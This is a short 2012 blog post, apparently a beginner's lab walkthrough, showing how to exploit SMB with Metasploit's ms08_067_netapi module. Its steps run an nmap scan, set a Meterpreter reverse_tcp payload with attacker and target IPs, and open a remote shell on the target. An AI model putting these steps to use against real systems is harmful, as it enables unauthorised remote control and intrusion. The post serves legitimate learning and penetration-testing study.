♋...Learn Harder, Keep Humble, Not For The Fain Heart !, Respect Others, Try Harder...♋

Tuesday, September 11, 2012

Exploit SMB Using Metasploit

This time i try exploit using metasploit, lets start..

The first, I scan the network using nmap to find the open ports
type the command : nmap -f 192.168.56.101
-f is a fast-scanning that nmap will scan as soon as possible ...



And then, open the metasploit on start menu or via terminal, here i'm using terminal
type the command : root@bt:~# msfconsole
wait a moment's, usually a bit longer..



Now search the netapi


Use exploit/windows/smb/ms08_067_netapi and show the options


Now set lhost 192.168.56.1 (Our IP address)
            rhost 192.168.56.101 (IP address of the target)
            rport 4444 (PORT on backtrack)
            PAYLOAD windows/meterpreter/reverse_tcp


then start exploit


we have entered meterpreter, continued we will control commandprompt (CMD) target. but we must know who we are. type the command : getuid, and then type command pwd to find out where we are . the last, type the command:  shell to go to C system.


Finish, we can do anything.. but i do not do anything, because just it that i know.. maybe the next meeting i got more than this.. thanks








No comments:

Post a Comment